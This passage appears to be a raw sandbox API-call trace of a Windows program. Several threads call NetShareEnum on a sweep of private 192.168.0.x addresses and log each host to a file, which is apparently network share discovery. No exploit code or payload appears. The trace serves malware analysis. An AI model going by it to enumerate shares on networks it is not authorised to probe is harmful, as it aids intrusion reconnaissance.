lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.313] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.313] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x4f1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4f1fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.317] NetShareEnum (in: servername="\\\\192.168.0.99", level=0x1, bufptr=0x4f1fedc, prefmaxlen=0xffffffff, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc | out: bufptr=0x4f1fedc, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc) returned 0x35 [0178.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.161", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.161", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.161", lpUsedDefaultChar=0x0) returned 15 [0178.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.275] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.275] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4f1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4f1fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.283] NetShareEnum (in: servername="\\\\192.168.0.161", level=0x1, bufptr=0x4f1fedc, prefmaxlen=0xffffffff, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc | out: bufptr=0x4f1fedc, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc) returned 0x35 [0211.209] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.244", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.209] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.244", cchWideChar=15, lpMultiByteStr=0x1e8322c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.244", lpUsedDefaultChar=0x0) returned 15 [0211.209] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4f1fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4f1fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.468] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.468] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4f1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.468] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.468] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.468] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4f1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4f1fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.468] NetShareEnum (in: servername="\\\\192.168.0.244", level=0x1, bufptr=0x4f1fedc, prefmaxlen=0xffffffff, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc | out: bufptr=0x4f1fedc, entriesread=0x4f1fed4, totalentries=0x4f1fed0, resume_handle=0x4f1fecc) returned 0x35 [0258.005] SetEvent (hEvent=0x1dc) returned 1 [0258.005] RtlExitUserThread (Status=0x0) Thread: id = 57 os_tid = 0xc7c [0088.772] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.36", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.772] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.36", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.36", lpUsedDefaultChar=0x0) returned 14 [0088.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.772] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.772] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.772] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.772] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.772] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x505fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x505fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.776] NetShareEnum (in: servername="\\\\192.168.0.36", level=0x1, bufptr=0x505fedc, prefmaxlen=0xffffffff, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc | out: bufptr=0x505fedc, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc) returned 0x35 [0144.478] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.115", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.478] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.115", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.115", lpUsedDefaultChar=0x0) returned 15 [0144.478] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.478] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.478] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.479] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.479] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x505fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x505fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.483] NetShareEnum (in: servername="\\\\192.168.0.115", level=0x1, bufptr=0x505fedc, prefmaxlen=0xffffffff, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc | out: bufptr=0x505fedc, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc) returned 0x35 [0178.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.144", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.144", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.144", lpUsedDefaultChar=0x0) returned 15 [0178.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.158] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x505fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x505fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.162] NetShareEnum (in: servername="\\\\192.168.0.144", level=0x1, bufptr=0x505fedc, prefmaxlen=0xffffffff, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc | out: bufptr=0x505fedc, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc) returned 0x35 [0211.210] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.247", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.210] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.247", cchWideChar=15, lpMultiByteStr=0x1e8328c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.247", lpUsedDefaultChar=0x0) returned 15 [0211.210] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x505fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x505fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.394] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.394] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x505ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.395] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x505fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x505fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.398] NetShareEnum (in: servername="\\\\192.168.0.247", level=0x1, bufptr=0x505fedc, prefmaxlen=0xffffffff, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc | out: bufptr=0x505fedc, entriesread=0x505fed4, totalentries=0x505fed0, resume_handle=0x505fecc) returned 0x35 [0258.072] SetEvent (hEvent=0x1dc) returned 1 [0258.072] RtlExitUserThread (Status=0x0) Thread: id = 58 os_tid = 0xc84 [0088.777] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.37", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.777] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.37", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.37", lpUsedDefaultChar=0x0) returned 14 [0088.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.777] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.777] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.777] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.777] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.777] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x519fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x519fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.781] NetShareEnum (in: servername="\\\\192.168.0.37", level=0x1, bufptr=0x519fedc, prefmaxlen=0xffffffff, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc | out: bufptr=0x519fedc, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc) returned 0x35 [0144.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.98", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.98", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.98", lpUsedDefaultChar=0x0) returned 14 [0144.304] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.304] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.304] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x519fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x519fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.308] NetShareEnum (in: servername="\\\\192.168.0.98", level=0x1, bufptr=0x519fedc, prefmaxlen=0xffffffff, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc | out: bufptr=0x519fedc, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc) returned 0x35 [0178.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.163", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.163", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.163", lpUsedDefaultChar=0x0) returned 15 [0178.294] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.294] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x519ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.294] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x519fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x519fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.298] NetShareEnum (in: servername="\\\\192.168.0.163", level=0x1, bufptr=0x519fedc, prefmaxlen=0xffffffff, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc | out: bufptr=0x519fedc, entriesread=0x519fed4, totalentries=0x519fed0, resume_handle=0x519fecc) returned 0x35 [0211.209] 